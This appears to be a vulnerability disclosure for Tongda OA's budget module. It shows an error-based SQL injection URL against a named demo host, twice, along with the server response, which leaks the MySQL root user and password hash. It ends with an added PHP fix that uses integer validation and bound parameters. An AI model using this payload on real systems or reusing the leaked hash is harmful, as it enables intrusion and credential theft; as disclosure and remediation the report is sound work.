### Brief description:

Tongda (通达)

### Details:

Official demo login: http://www.day900.com/ cw

The login requirement makes this somewhat underwhelming.

Injection point + payload:

```
http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015
```

Response:

```
请联系管理员 错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_year_depts.php
```

### Proof of vulnerability:

Injection point + payload:

```
http://www.day900.com/general/budget/budget_process/budget_year_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#)&YEAR=2015
```

Response:

```
请联系管理员 错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='Y' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_year_depts.php
```
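
The SQL in the error output shows `DEPT_IDS` being placed unquoted inside `DEPT_ID IN (...)`. The following is an added example (not code from the report or from Tongda) of how that filter can be built safely: the value is parsed strictly as a list of integers and each ID is bound as a parameter. The function names, the use of PDO and the in-memory SQLite demo data are assumptions; the table and column names come from the SQL statement shown above.

```php
<?php
// Added example, not Tongda's code. Table and column names are taken from the
// SQL in the error output; function names, PDO and the SQLite demo are assumptions.

// Accept DEPT_IDS only as comma-separated decimal integers.
function parse_dept_ids(string $raw): array
{
    if (!preg_match('/^\d{1,9}(,\d{1,9})*$/D', $raw)) {
        throw new InvalidArgumentException('DEPT_IDS must be a comma-separated list of integers');
    }
    return array_map('intval', explode(',', $raw));
}

// Same query as in the report, with one bound placeholder per ID.
function count_budget_results(PDO $db, string $deptIds, string $year): int
{
    if (!preg_match('/^\d{4}$/D', $year)) {
        throw new InvalidArgumentException('YEAR must be four digits');
    }
    $ids   = parse_dept_ids($deptIds);
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt  = $db->prepare(
        "SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT
         WHERE FORMATION_WAY = 'Y' AND DEPT_ID IN ($marks)
           AND ALLOW = '1' AND BUDGET_YEAR = ?"
    );
    $stmt->execute(array_merge($ids, [$year]));
    return (int) $stmt->fetchColumn();
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE BUDGET_RESULT (BUDGET_RESULT_ID INTEGER PRIMARY KEY,
           DEPT_ID INT, FORMATION_WAY TEXT, ALLOW TEXT, BUDGET_YEAR TEXT)");
$db->exec("INSERT INTO BUDGET_RESULT (DEPT_ID, FORMATION_WAY, ALLOW, BUDGET_YEAR)
           VALUES (1,'Y','1','2015'), (2,'Y','1','2015'), (3,'Y','0','2015')");

echo count_budget_results($db, '1,2,3', '2015'), "\n";

// Leading part of the DEPT_IDS value from the report: rejected before any SQL is built.
try {
    count_budget_results($db, '1) and (select 1', '2015');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The response in the report also returns the MySQL error text and the full SQL statement to the client; logging those server-side and returning a generic message removes the channel the error-based payload relies on.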